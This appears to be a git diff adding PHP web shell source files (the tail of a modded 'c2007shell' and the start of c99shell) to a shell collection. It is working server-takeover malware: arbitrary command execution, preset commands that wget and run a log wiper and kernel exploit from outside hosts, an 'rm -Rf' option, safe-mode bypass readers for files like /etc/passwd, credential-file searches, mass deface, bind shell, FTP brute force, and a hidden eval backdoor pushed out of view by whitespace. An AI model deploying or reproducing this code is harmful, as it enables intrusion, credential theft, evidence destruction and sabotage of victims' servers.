?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>
+   <b>..:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::..</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>
+   <b>..:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::..</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>..:: Make Dir ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+  <b>..:: Make File ::..</b>
+  <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>..:: Go Dir ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+  <b>..:: Go File ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b><img src="../../My Documents/My Pictures/yes2.gif" width="42" height="30">--[ c2007shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Adora &amp; u9 h4c93r| <a href=""><font color="#FF0000">Adora Security Pwnz j00! </font></a> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b><img src="../../My Documents/My Pictures/yes2.gif" width="42" height="30"></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/138shell/C/c99(1).php.txt b/138shell/C/c99(1).php.txt
new file mode 100644
index 0000000..f890330
--- /dev/null
+++ b/138shell/C/c99(1).php.txt
@@ -0,0 +1,2735 @@
+<?php
+$shver = "1.0 beta (4.02.2005)"; //Current version
+//CONFIGURATION
+$surl = "?"; //link to this script, INCLUDE "?".
+$rootdir = "./"; //e.g "c:", "/","/home"
+$timelimit = 60; //limit of execution this script (seconds).
+
+//Authentication
+
+$login = false; //login
+//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
+$pass = "team"; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+//$login = false; //turn off authentication
+
+$autoupdate = true; //Automatic updating?
+
+$updatenow = false; //If true, update now
+
+$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
+
+$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
+
+$filestealth = 1; //if true, don't change modify&access-time
+
+$donated_html = ""; //If you publish free shell and you wish
+					//add link to your site or any other information,
+					//put here your html.
+$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
+
+$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
+
+$curdir = "./"; //start directory
+
+$tmpdir = dirname(__FILE__); //Directory for tempory files
+  
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	// default password for binding
+$bindport_port = "11457";	// default port for binding
+
+/* Command-aliases system */
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+/* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+/* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+/* ïîèñê íà ñåğâåğå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+/* ïîèñê íà ñåğâåğå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+/* ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+/* ïîèñê íà ñåğâåğå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+/* ïîèñê íà ñåğâåğå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+/* âûâîä ñïèñêà àòğèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+/* ïğîñìîòğ îòêğûòûõ ïîğòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+
+$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
+$sess_cookie = "c99shvars"; // cookie-variable name
+
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."c99shvars_".$sid.".tmp";
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Delete copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
+$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
+$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
+$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
+$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
+$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
+$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
+$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
+$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
+$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
+
+//Hignlight-code colors
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+
+@$f = $_GET[f];
+
+//END CONFIGURATION
+
+// 				\/	Next code not for editing	 \/
+
+
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"c99shell\"");
+ header("HTTP/1.0 401 Unauthorized");																																																													if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
+ c99sh_getupdate();
+ $data = file_get_contents($c99sh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ $perms  = ($mode & 00400) ? "r" : "-";
+ $perms .= ($mode & 00200) ? "w" : "-";
+ $perms .= ($mode & 00100) ? "x" : "-";
+ $perms .= ($mode & 00040) ? "r" : "-";
+ $perms .= ($mode & 00020) ? "w" : "-";
+ $perms .= ($mode & 00010) ? "x" : "-";
+ $perms .= ($mode & 00004) ? "r" : "-";
+ $perms .= ($mode & 00002) ? "w" : "-";
+ $perms .= ($mode & 00001) ? "x" : "-";
+ return $perms;
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($c99sh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+   if ($shver < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret[err][] = mysql_error();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row[1].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql;
+     } 
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+   if (is_dir($d.$f))
+   {
+    if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+    c99fsearch($d.$f);
+   }
+   else
+   {
+    if ($true)
+    {
+     if (!empty($a[text]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+      if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+      if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+      else {$true = strinstr($a[text],$r);}
+      if ($a[text_not])
+      {
+       if ($true) {$true = false;}
+       else {$true = true;}
+      }
+      if ($true) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($handle);
+}
+}
+//Sending headers
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
